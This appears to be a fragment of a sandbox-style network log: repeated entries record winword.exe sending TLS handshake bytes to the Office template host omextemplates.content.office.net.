  226. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb55y\\xdc\\xef\\x061\\x1e9\\xb7\\xf5\\xca\\xbb\\xd8\\x9ce \\x15\\x83bw\\x15\\x10\\xeb\\x00@)\\x01j\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  227.  
  228.  
  229. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xfe\\x8e\\x9a\\xef\\xebi\\xf7\\x1e\\xe9k\\xcdc\\x7f\\x0e\r\\x80\\xc7b\\x1e;\\x98\\xde&q\\xf8\\x10\\xa6\\xef\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  230.  
  231.  
  232. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x1av\\xbe\\xcf\\x91\\xea\\xca\\x01nq$\\x8bnv\\xf7x\\xf3\\xd2\\x7f\\xb2\\xcd\"j\\xf7\\xae\n\\xfc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  233.  
  234.  
  235. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5>\\xbd\\x04^~\\x9d\\x86\\x84,j\\xf8\\xe344a\\xfa^po\\x15*:6\\x17`\\xe3\\xbe\\xb1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  236.  
  237.  
  238. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x17y\\xf504\\xa3\\x06\\x1bz\\x10\\xbf(sy\\x16\\x16\\x0f\\xac\\x8b\\xca\\x9ae\\xc8\\xf8\\x97\\xc0\\x89\\xaf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  239.  
  240.  
  241. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb54ri,\\xc2\\xde^o<\\xca`m\\xe5\\x83\\xea\"\\x89j\\xd1\\xcbwl\\xf9\\xaa\\xa5\\xf37l\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  242.  
  243.  
  244. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5;\\xb8\\x04\\xde\\xe5p1\\xa8e\\x9f\\x83lpo%=m\"\\xe2*\\x92\\x957\\xe8\\xe1\\x8a;\\xbe\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  245.  
  246.  
  247. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5*\\xfec\\xd4\\xee\\xb0\\x9c\\x0b\\x93\\x81\\xe6\t\\xac\\x9bge\\xd8\\x91\\x82\\xf4f\\x10\\xccs\\xb0\\xdax\\xf6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  248.  
  249.  
  250. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xa7\\xc3\\xe9ci\\x11|i&\\*\\x7f\\xeef\\x08\\xe8\\xe0h\\xc8\\xc3\\xa9\\xd0\\xb8\\xb0\\x84xi\\x17\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  251.  
  252.  
  253. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5^\\xd2a)/\\xad\\x10l\\x04\\xd6\\xa9 \\xd9m\\xc7\\x15pa\\xca\\x18\\xab\\xd5\\x87p2\\x00\\x10^\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  254.  
  255.  
  256. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x91#\\xa5\\xc8v\\x03\\x92`\\x1f\\xb1sn\\xa9q>x\\xa2\\x7f\\xec)\\xa8>px!\\xa3a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  257.  
  258.  
  259. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x87\\x87tsi\\x03\\xf2u.b`\\x8b\\x13q\\x8a\\xc0\\xec\\xad,+\\x1f/2`\\xe1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  260.  
  261.  
  262. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xc0\\xb3\\x13>m\\x96v\\xbf\\x12c\\x815\\x01|\\x06\\xd1\t\\x00a\\xfb\\xfa\\\\xf4\\xc9\\x1d\\xbc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  263.  
  264.  
  265. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x02w\\xb3`%a\\x7fc\\x13\\x00\\xa9\\x19\\x1f\\xaev\\x13\\x95\\xec\\xe9id\\x1a:\\xf0|k\\xd6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  266.  
  267.  
  268. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5f\\xb8\\x90\\xe4\\x13\n\\x17sa-\\xdd\\xbbr\\xd5\\xbb\\x94\\x94ax?%\\xea\\x06_q\\xd0\\xd1g\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  269.  
  270.  
  271. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5d\\x998\\x19\\xe9\\x8f\\x9d(^\\x98jc\\xa8\\x15y\\x08\\x189\\xc4\\xb4\\xf4\\xb3\\xb6\\x10\\xa9i6\\xe7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  272.  
  273.  
  274. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5e\\xba\\x92\\x82^\n`l7\\xc10\\xde\\xc5\\x03\"r\\xd9\\xa3\\xc5\\xb8=\\x87i\\x0fnz\\xfe(\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  275.  
  276.  
  277. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb50\\xe9\\x9b\\x14\\x8a\\x08\\x07\\x94%\\x07\ri\\xa2\\xd4*\\xa8\\x8a@e>\\xbd>\\xb1\\xb08\\x0e3\\xf8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  278.  
  279.  
  280. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x96\\xaf\\x8b\\xc8\\xd7\\xe7\\xdeejp\\xac~a\\xd4\\xf2\\x14z\\xae\\x10\\x8b\\x1d\"8\\xc8c\\x82\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  281.  
  282.  
  283. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x1f\\xc5\\xf6\r\\xb3\\x85i\\x86\\x9a\\x93s\\xe4#g\\xfd\\xfck\\x12\\xcd\\xc3\\x10\\xa0+\\x871\\xc6\\xc1x\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  284.  
  285.  
  286. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5@\\xf5\\x90\\xae\\xea)\\xbc?\\xd6\r\\xc9\\xb1j\\xa7\\xf7_\\x99k\\xd17ut_#g\t\\xcf\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  287.  
  288.  
  289. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe8\\x8c\\xc7\\x9b%_*3\\x8f#=\\xb3yyo\\xe6\\xd9\\xee\\xf5\\x94/fk,\\xddf\\xde jm\\xbao\\xed\\x16hz\\x05\\xbau\\xc4\\x9d\\x0f\\x82>\\xfb\\xc8\\x9b\\xf5\r:\\xb6e\\xa3\\xc4\\xd8\\x96\\xda;\\xd0\\xef\"g\\xd5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb6\\x90a\\xafm`\\x165`\\x0e\\xef\\xc3\\xfe\\xca\\xbf\\xdd\\x9bq\\x9a!\\xc1\\xa5\\x15z\\xe2i\\x1b\\x16\\x92\\xb1\\xe4pi\n \\x1c\\xe5\\x87\\xaa\\xf6\\xf7zf\\x07\\xf5\\xc2\\x94u"
  290.  
  291.  
  292. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x86\\x90\\x91ub\\xca\\x97\\xe6\\xdf\\xa4\\xaej\\xac\\xa2m\\xca=\\xf5\\xaf\\xc4*\\xa6\\xfd\\xf3y\\xdfb\\x07\\xec\\xd4\\x92\\xcb\\x87\\x81\\xd9\\xc9\n\\x7fc\\x07\\xa0u\\xd1\\xafr\\x04$\\\\xac\\xe8\\x7f\\xd1\\xf6\tk\\xff\\xc3\\xde\\xd4\\x15\\xae\\x85\\x18\\x8e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000f\\xe6\\x90\\x17$\\xb1\\xc4\\xf1#s\nly\\x16\\xcd(\\xc7mx\\x96w\\x12\\xb7\\xcec3\\xaez\\x19\\x0b\\xc7\r=\\\\xc3c\\x16\\xeab\\x08u\\xa4\\xe0\\x19\\xf1!&,"
  293.  
  294.  
  295. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xe6a\\xac\\xd6b\"lr\\x00\\x1c\\xd3\\xd5\\x84\\x1c\\xe1\\x17\\xb9\\xdc\\x84\\x9c\\xec\\x87\\x14\\x97\\xfd\\x88\\x8c\\x1f\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  296.  
  297.  
  298. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5vji\\xe4xr\\x0f\\x9c\\xb9\\xc4\\x06`q\\x8a\\xb0eh\\xd5\\x9a^\\x95&.\\x99\\xb7\\xaa(\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  299.  
  300.  
  301. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd7\\xd2_dg\\xffwiv\\x0f\\xa2xn\\x05\\x1a\\x8ejyoy\\x87\\xfba\\xdfxh\\xceo\\xc9h4\\x86\\xa0\\x10\\xf6\\xfc\\xe8\\xca\\xb6\\x98\\x80n8\\xdf>\\x94\\x11\\xf7\\xe2\\x7fg\\x8e\\xf2)rd9\\xb0\\x8bk\\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xad\r\\xcf\\x0e\\xc4\\x87\\xdc\\x9d\\x15\\xd8,c\\x04o\\x0f\\xac\\x81\\xc0\\x1a\\x16f\\x98lbq!\\x19\\xe0\\x86\\xb2?\\xad\\x8fv\\xdei\\xb7\\xaf\\xd8\\xf7\\x98\\x04 pb\\xa5\\xdfz"
  302.  
  303.  
  304. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xac\\x88\t\\x11\\x7fe\\x8f\\xc5i\\xe8f\\xe3\\x8eq\\xd4\\xb5 $\\xbd@i\\xb1u\\xfe\\x8e\\xb4\"\\x7f\\xbe\\xb5\\x00\\x7fm\\x9e\\xe9\\xbb\\x91cjj/!\\x80 f\\xbb\\xd1-\\xec\\xf2d?77\\x96\\x83ut\\x7f(\\x9d\\xc2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000`*k+\\xd4\\x131\\x82(a\\x05\\xa0y\\xda\\x80\\xf3g\\xd5\\x82\\xab\\xb8\\x1f\\xe5\\x15\\x13p\\xc2q\\xb8x\\xf8\\x19@=\\x0f\\xb1#\\x87\\x11\\xec\\xccy\\xe1\\xf7e\\xf4\\xc9"
  305.  
  306.  
  307. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04w\\x7fd,mw\\xeaj\\xa7\\xaa\\x02t\\xb6\\x04\\xb2j\\xcf\\xfc|\\x18;tuw\\xf6\\xfdj%\\xcb\\x85xx\\xc4z\t\\xf3k\\xc6^\\xb1\\xdccz\\xb9+=\\xfe_\\xbe\\x8e\\xf3\\xe0\\xa8$d\\xc6\\xac\th<\\x1e\\x8d\\xee\\xbf\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x05\\x14#t~@\\xd3\\xd7\\x86\\xd0y\\xeaf\\xeadp\\xcd\\x05\\xa2\\xd9\\xac\\xef\\xff\\xaf\\xc5\\xf61o\\xb4\\x982u\\x8c\\xc7w\\xde\\xd4\\xd0;x\\\\x81!\\xdb\\xd6\\xa0\\xd2"
  308.  
  309.  
  310. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfc^\\xe1\\x10\\x10c\\x83\\x14 \\x12:xx\\xf7\\x8f\\x93\\xe4\\x19\\x90\\xc6m\\xca!f\\x0e2\\x0erm\\x1fap\\x88\\xf2h\\x9a\\x10\\xe0\\x16\\x9f\\xf2\\xff\\xf1\\x19\\xfa\\xcfg\\xb8\\xf2\\xa3\\xaa\\xc6\\x80d\\xf3)i\\xa9\\xbd\\xc1\\x93\\xbd'\\x84\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa0\\x19%\\x90\\x18\\x83\\xc0\\xb7\\xe3\\\\xd8\\xdc\\x1c\\x8e\\x11\\xcc\\x08\\x8ed\\x07\\x11\\x00\\xd3\\xf6;\\xfb\\x92/\\x8d\\xe3o#m\\xa6\\xaa\\xd6t\\x8d\\x98\\x12w\\x99\\xf7~\\xb1\\xe7x\\x08"
  311.  
  312.  
  313. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x19\\xfe\\xca\\x9d\\x072\\xc3d\\x85g\\x18lb\\xf4\\x7f\\xccs\\xee\\xbc\\xb0~\\xdf@x\\x18z\\xe6\\x99uz\\xc5\\xf1:\\x97\\x07\\xe4)\\x80o/.\\x05l\\xbf\\xc2i\\xe7\\xb7?9(\\x16\\xd9\\x9f\\xeb%=\\x93\n^\\x11\\xb7\\x0b/\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1d\\x94>fm\\x8e\\x89\t/\\xd4\\x8f\\xdf\\xba;\\xaa\\x05t&s\\x00\\xc9x\\xcf!g\\x0b<\\xd8f\\x80f\\x14\\xf1\\xd6\\x92\\x00\\x8c\\xce\\xa2\\xa8\\x00\\x91'\\\\xf1\\x914\\x95"
  314.  
  315.  
  316. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04g~\\xaa\\xc8\\xbe\\xe2\\xd3\\xc3\\xad\\xc4\\xee%g\\xc3\\x93~9\\x02\\xabm*:-\\x1e\\xbb\\x1fq)\\x116!\\xb1vbje\\xcaq\\xc5\\x0f)\rt\\xb1\\x87\\xc2?\\x16b\\xdd\\x98m\\x0e\\xbb\t_b\\xd3,\\x0b\\x9e\\x07\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf1c1\\x86\\xf9\\xaa\\xa4+\\x15,\\xa2\\xc9\\xf3\\xa1@\\x15\\xd49\\\\xef\\xad\\xda|\\xd3\\xe7\\x92\\xf8a\\xe5\\x1cv\\xe0\\xc1i,i1\\xf1\\x8b\\xcf\\xc7\\x84?\\xa2i("
  317.  
  318.  
  319. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5ea\\xcdr5d\\xfdge\\xf3\\xb9\\x15q5\\xd5\\x16.5h\\xc7\\xfc\\xba\\xec\\x95\\x15\\x89\\x98\\x12\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  320.  
  321.  
  322. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\"\\ell\\x88w\\x0c\\xc6y\\xd9\n*%\\x98\\xf5\\xb3<$\\x8b\\xbd\\xca\\xc3n9\\x94\\x02d/\\x0e.\\xc1\\xf6\\xd2+\\xfc\\x06q\\xc6\\x8cu`\\xd3\\x12\\xae0i:\\x05\\xa0w\\x9fk%\\xa7uq\\xd0\\xc2\\x02\\xf5\\x96\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000*\\xdft\\xba\\x16\\xd6\\x7f\\xb9~\\xe64lq\\xc2\\xfb\\xee\\x9a\\x95\\x8d\\x8f~2|g\\xd3\\xfe\\x917\\x1b5\\x04\\xb6\\xaf\\x00\\x14z|=\\xee\\xfcy\\x9d\\xf6\\x9e\\x89y\\xd8"
  323.  
  324.  
  325. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04q\\xc9pv\\xa8\\xdb\\xeb\\x17\\xf9\\xf6\\xfc\\x17\\xac\\xf7\\xcf\\x8e\\xe31\\xb7\\xb4`\\x1e\\xb5h\\xd9\\x84\\x81\\x05\\xdcz?\\xb2\\xc5c\\xe2\\x82.\\xc9\\x11(\\xd4j\\xa7y$\\xf8\\xe4\\x91\\x92\\xd8\\xf7\\x13\n\\xad8\\xc7\\x94%\\xc5qw:y\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x898\\xdb\\xd9\\x98kr\\xa1^\\xcc\\xad\\xebg8\\xae\\xa2\\xf5p\\xc6\\x1c\\xac\\xc1\\xe5\\xa1b4\\x08\\xac\\x8f\\xa00\\xc6\\xc8\\xd5\\xc9~*\\xbe\\x9e\\xe7\\xa3\\xf4\\x99\\xcc!;\\xbc"
  326.  
  327.  
  328. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa8\\xdfj\\xa6-+\\x9e\\x930\\xf8\\xb7\\xce\\xae\\x97\\x89\\xdb!v\\xdf\\xda\\x9b\\xa3_m\\x9dav3\\x06\\xa8\\xa8\\xad\\xf2q\\xb5\\x1de\\xe6\t=\\x0f5\\x93\\xb8db\\x04\\xcb8\\x1bf\\xcdok\\xbfb\\x99\\xb2q\\x10w\\xcf\\xcf\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb8l\\x80*\\xf3\\x15f\\x93\\xdbiyj2=\\xd7\\x01 \\xf1\\xfch\\xa4c-\\x8f\\xc2;!\\xd5\\x8c\\x80tf\\xab\\x9e\\xf1\n\\xf3\\xb36\\xb6\\x1f\\xbf\\x1e\\x1d.@\\xf5"
  329.  
  330.  
